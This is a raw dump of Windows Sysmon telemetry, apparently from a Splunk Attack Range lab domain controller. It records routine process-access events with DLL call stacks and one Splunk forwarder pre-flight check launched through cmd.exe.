10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4A00-000000007F01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0B-5F80-4A00-000000007F01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.749{733EE690-3E0B-5F80-4A00-000000007F01}3836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.666{733EE690-3E0B-5F80-4900-000000007F01}29683844C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.463{733EE690-3E09-5F80-3000-000000007F01}24563344C:\Windows\system32\DFSRs.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.448{733EE690-3DF9-5F80-1000-000000007F01}11322112C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-3000-000000007F01}2456C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\S